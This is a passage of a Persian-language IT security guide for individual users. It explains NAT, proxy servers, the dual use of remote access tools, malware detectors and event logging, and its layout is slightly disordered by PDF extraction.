ﺧﺼﻮﺻﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺼﻮﺭﺕ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒـﺎﻁ
ﺑﺮﻗﺮﺍﺭ ﻧﻤﻲﻛﻨﻨﺪ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ .ﺍﮔﺮﭼﻪ
ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺍﺯ ﻣﺠﻤﻮﻋــﻪ ﺁﺩﺭﺳــﻬﺎﻱ
ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﻫﻴﭽﻴﻚ ﺍﺯ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺳـﺎﻳﺮﻳﻦ
ﺭﺍ ﺑﺒﻴﻨﻨــﺪ ﻭ ﻟــﺬﺍ ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎﻱ ﻣــﺸﺎﺑﻪ ﻫــﻴﭻ ﻣــﺸﻜﻠﻲ ﭘﺪﻳــﺪ
ﻧﻤﻲﺁﻭﺭﻧﺪ.
ﺩﻭ ﺭﻭﺵ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺁﺩﺭﺱ
ﺧﺼﻮﺻﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ:
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Proxy
١١٢
NAT
١١٣
NATﺟﺎﻳﮕﺎﻫﻲ ﺑﻴﻦ ﺷـﺒﻜﺔ ﻣﺤﻠـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ ﻭ
ﻣﺸﺎﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ proxyﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﺔ ﻣﺤﻠﻲ
ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ IPﺧﺼﻮﺻﻲ ﺩﺭ ﺁﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﻣـﺮﺗﺒﻂ
ﻣﻲﺑﺎﺷﺪ .ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﭘﻴﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ NATﺍﺯ ﺷﺒﻜﺔ
ﻣﺤﻠﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﺩ NAT ،ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ
ﺍﺯ ﺁﺩﺭﺱ IPﺧــﻮﺩ ﺍﺭﺳــﺎﻝ ﻣــﻲﻛﻨــﺪ ﻭ ﺍﻳﻨﻄــﻮﺭ ﻭﺍﻧﻤــﻮﺩ
ﻣﻲ ﻛﻨﺪ ﻛﻪ ﭘﻴﺎﻡ ﺍﺯ ﭘـﻮﺭﺗﻲ ﻓﺮﺳـﺘﺎﺩﻩ ﺷـﺪﻩ ﻛـﻪ ﺩﺭﺣـﺎﻝ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻴﺴﺖ ،ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺎﺳﺦ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ،
ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺻﻠﻲ ﺩﺭ ﺷﺒﻜﺔ ﻣﺤﻠـﻲ ﺑـﺎﺯ ﻣـﻲﮔـﺮﺩﺩNAT .
ﺷﺒﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ proxyﻋﻤﻞ ﻣﻲﻛﻨـﺪ ،ﺍﻣـﺎ ﺑـﺮﺍﻱ
ﻫﻤﺔ ﺍﻧﻮﺍﻉ ﺗﺮﺍﻓﻴﻚ )ﻭ ﻧﻪ ﻓﻘﻂ ﺗﺮﺍﻓﻴﻚ (webﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ
ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ cachingﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻧﻤﺎﻳﺪ.
ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ proxyﻧـﻮﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ
ﺍﺳﺖ .ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ ﺩﺭ ﻓـﻀﺎﻱ
ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﻭ ﺁﺩﺭﺱ
ﺛﺎﻧﻮﻳﻪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ .ﺍﮔـﺮ ﻛـﺎﺭﺑﺮﻱ
ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺑﺎ ﺁﺩﺭﺳﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺧـﺼﻮﺻﻲ
ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ ،ﭘﻴﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
proxyﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﭘﻴﺎﻡ ﺭﺍ ﺑـﻪ
ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺳﺎﻧﺪ .ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ
ﺩﺭﺧﻮﺍﺳﺖ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﻓﺮﺳـﺘﺎﺩﻥ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﮕﻬـﺪﺍﺭﻱ
ﻣﻲﻛﻨﺪ ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﭘﺎﺳﺦ ﺁﻥ ﺑﺎﺯﮔـﺸﺖ ﺁﻧـﺮﺍ ﺑـﻪ ﺩﺳـﺘﮕﺎﻩ
ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﺑﺎﺯﭘﺲ ﻣﻲﻓﺮﺳﺘﺪ.
ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﺧـﻂ ﺗﻠﻔـﻦ ﻳـﺎ
112 Proxy Servers
113
114
115
116
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ proxyﻭ NATﻫﺮ ﺩﻭ ﻣﺜﻞ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ
ﺁﺗــﺶ ﻫــﺴﺘﻨﺪ ﻭ ﺍﺯ ﺩﺳــﺘﮕﺎﻫﻬﺎﻳﻲ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ
ﺧﺼﻮﺻﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﻣﺤﺎﻓﻈـﺖ
ﻣﻲﻛﻨﻨﺪ.
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ،ﻣﺪﻳﺮﻳﺖ،
ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ
ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،١١٤ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣــﺪﻳﺮﻳﺖ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ١١٥ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ١١٦ﺍﻳﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﻓـﺮﺍﻫﻢ
Network Address Translation
Remote Access Tools
Remote Management Tools
Remote Administration Tools
٩٧
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺍﻳﻨﺘﺮﻧﺖ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ
ﻣﺘﺼﻞ ﻣﻲ ﺷﻮﻳﺪ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺖ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺩﺳـﺘﮕﺎﻩ
ﺧﻮﺩ ﻧﺸﺴﺘﻪﺍﻳﺪ.
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭼﻬﺎﺭﻡ:
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻣﻬﻢ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧـﺪ.
ﺍﺯ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﻛﺮﺩ:
•
ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ ﻧﺪﺍﺭﻳـﺪ
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ.
ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺩﺍﺩﻩﻫﺎ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻭ
ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
•
ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﻨﺪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﻣﻌﺎﻳﻨـﻪ ﺑـﻪ ﻳـﻚ
ﻣﺘﺨﺼﺺ ﻧﺸﺎﻥ ﺩﻫﻴﺪ؛ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﻭﻱ ﺭﺍ ﺑﻪ ﻣﺤﻞ ﻛـﺎﺭ
ﺧﻮﺩ ﺑﺒﺮﻳﺪ.
•
ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ
ﺗﻨﻬﺎ ﺑﺮ ﺭﻭﻱ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
•
ﻣﺴﺌﻮﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ
ﭼﻨﺪﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﺪﻳﺮﻳﺖ ﻧﻤﺎﻳﻨﺪ.
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻴﺰ
ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺗﻤـﺎﻣﻲ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ ﺭﺍ ﺍﻧﺠـﺎﻡ
ﺩﻫﻨــﺪ .ﺩﺭ ﺣﻘﻴﻘــﺖ ﻣﻴــﺎﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺭ
ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﻣــﺬﻛﻮﺭ )ﻣﺎﻧﻨــﺪ (pcAnywhereﻭ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ
ﺗﺮﺍﻭﺍﻫﺎ )ﻣﺜﻞ Back Orificeﻳﺎ (NetBusﺗﻔﺎﻭﺕ ﻋﻤﻠﻜﺮﺩ ﭼﻨـﺪﺍﻧﻲ
ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ
ﻓﺮﺽ ﻛﻨﻴﻢ ﺷﻤﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﻛﻨﻴﺪ ،ﻭﻳﺮﻭﺱ
ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ ،ﺍﺯ ﻧﺎﻣﻬـﺎﻱ
ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ﻭ ﻳـﻚ
ﻼ ﺍﻳﻤﻦ ﻫـﺴﺘﻴﺪ؛
ﺣﺎﻝ ﺍﮔﺮ ﺳﺆﺍﻝ ﺷﻮﺩ ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﺁﻳﺎ ﻛﺎﻣ ﹰ
ﺦ ﻣﺜﺒﺖ ﺍﺯ ﺍﻃﻤﻴﻨﺎﻥ ﺻﺪ ﺩﺭﺻﺪﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺖ.
ﺑﺎﺯ ﻫﻢ ﭘﺎﺳ ﹺ
ﻫﻤﻴﺸﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﺍﺭﺍﺋـﻪ ﺭﺍﻩﺣـﻞ ﺑـﺮﺍﻱ
ﻳﻚ ﺍﺷﻜﺎﻝ ،ﺷﻤﺎ ﺍﺯ ﻫﻤـﺎﻥ ﺍﺷـﻜﺎﻝ ﺁﺳـﻴﺐ ﺑﺒﻴﻨﻴـﺪ .ﻫﻤﭽﻨـﻴﻦ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ ﺁﻧـﺮﺍ
ﻼ ﺍﻳﻤﻦ ﺩﺍﻧﺴﺖ.
ﻛﺎﻣ ﹰ
"ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ" ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﻜﻮﻙ -ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﭼﮕـﻮﻧﮕﻲ ﻧـﺼﺐ ﺁﻧﻬـﺎ -
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ .ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻋﻤﻠﻜﺮﺩ
ﺁﻧﻬﺎ ﺑﺎ ﺟﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻭﻳﺮﻭﺱ ﺗﺪﺍﺧﻞ ﺩﺍﺭﺩ ،ﺯﻳﺮﺍ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬـﺎ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﻳـﺴﻚ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻤـﻮﺩﻩ،
ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛﻠﻴـﺪﻱ ﺳﻴـﺴﺘﻢ ﺑـﺼﻮﺭﺕ
ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﻨﺪ.
ﺍﻳﻦ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎ plug-inﻫـﺎ ﻭ add-onﻫـﺎﻱ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ
ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ
ﻭ ﻳﺎ ﺑﺮﺧﻼﻑ ﻗﻮﺍﻧﻴﻦ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﺳﺖ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣـﻲﻧﻤﺎﻳﻨـﺪ.
ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩﻥ
ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲﺷﺪﻩ ﻧﻴﺰ ﻫﺴﺘﻨﺪ.
ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺒﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﺔ
ﻻ ﺯﻳـﺎﺩ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ
ﺷﻤﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ
ﻧﻤﻲﮔﻴﺮﻧﺪ .ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﻱ ﺩﻳﺴﻚ ﻗﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ
ﻻ ﭘﻴـﺎﻡ ﻫﻨﮕـﺎﻣﻲ ﻧﻮﺷـﺘﻪ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻥ ﭘﻴﺎﻡ ﺑﻨﻮﻳﺴﻨﺪ .ﻣﻌﻤـﻮ ﹰ
ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺍﺗﻔﺎﻕ ﺭﺥ ﻣﻲﺩﻫﺪ ﻳﺎ ﺍﺷﻜﺎﻟﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ.
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭘﻨﺠﻢ:
ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻢ ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ.
ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺛﺒﺖ ﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
•
ﺭﺍﻳﺎﻧﻪ ﺭﻭﺷﻦ ﺷﺪ؛
•
ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪ؛
ﺑﺨﺶ ﺩﻭﻡ
ﺍﮔﺮ ﺍﺯ ﺍﻣﻜﺎﻧﺎﺕ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﺍﻳﻤﻨﻲ
ﻻﺯﻡ )ﻧﺎﻣﻬـــﺎﻱ ﻛـــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـــﺎﻱ ﻋﺒـــﻮﺭ ﻣﻨﺎﺳـــﺐ(
ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ،ﺗﺎ ﻣﻬﺎﺟﻤﻴﻦ ﻧﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻋﻠﻴﻪ
ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ
ﻣﻲﺑﺮﻳﺪ.
٩٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺷﺨﺼﻲ ﺳﻌﻲ ﺩﺍﺷﺖ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ ﺍﻣـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ
ﻭﻱ ﺍﺷﺘﺒﺎﻩ ﺑﻮﺩ؛
•
ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﺷﺪ؛
•
ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﻲﺧﻮﺍﺳـﺖ ﻓﺮﺳـﺘﺎﺩﻩ ﺷـﻮﺩ ﺍﻣـﺎ
ﺍﺭﺗﺒﺎﻁ ﻗﻄﻊ ﺷﺪ؛
•
ﺧﻄﺎﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺭﻭﻱ ﺩﻳﺴﻚ )ﻳﺎ ﺍﺭﺗﺒﺎﻁ ﺷـﺒﻜﻪﺍﻱ( ﭘـﻴﺶ
ﺁﻣﺪ؛
•
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﻚ ﺍﺭﺗﺒـﺎﻁ ﻏﻴﺮﻣﺠـﺎﺯ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﺁﻧـﺮﺍ
ﻣﺴﺪﻭﺩ ﻛﺮﺩ؛
•
ﺟﺴﺘﺠﻮﮔﺮ ﻭﻳﺮﻭﺱ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﻣﺠﻤﻮﻋـﺔ ﺟﺪﻳـﺪﻱ ﺍﺯ
ﻧﺸﺎﻧﻬﺎﻱ ﻭﻳﺮﻭﺱ ﺭﺍ downloadﻧﻤﻮﺩ؛
•
ﻳﻚ ﻭﻳﺮﻭﺱﻳﺎﺏ ﺗﻤﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺭﺍ
ﺑﺮﺭﺳﻲ ﻭ ﻳﻚ ﻭﻳﺮﻭﺱ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩ.
ﺑﺴﺘﻪ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣـﻲﺷـﻮﺩ،
ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻌﺪ ﺍﺯ ﺯﻳﺎﺩ ﺷـﺪﻥ ﺣﺠﻤـﺸﺎﻥ ﭘـﺎﻙ
ﺷﻮﻧﺪ ،ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﻓﺎﻳﻞ ﺛﺒﺖ ﺟﺪﻳـﺪﻱ ﺍﻳﺠـﺎﺩ
ﮔﺮﺩﺩ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺑـﺮﺍﻱ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﺑﻌـﺪﻱ ﻫﻤﭽﻨـﺎﻥ
ﺣﻔﻆ ﺷﻮﻧﺪ )ﻋﻤﺪﺗﹰﺎ ﺩﺭ ﻗﺴﻤﺘﻲ ﺍﺯ ﻧﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻳـﻚ ﺗـﺎﺭﻳﺦ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ(.
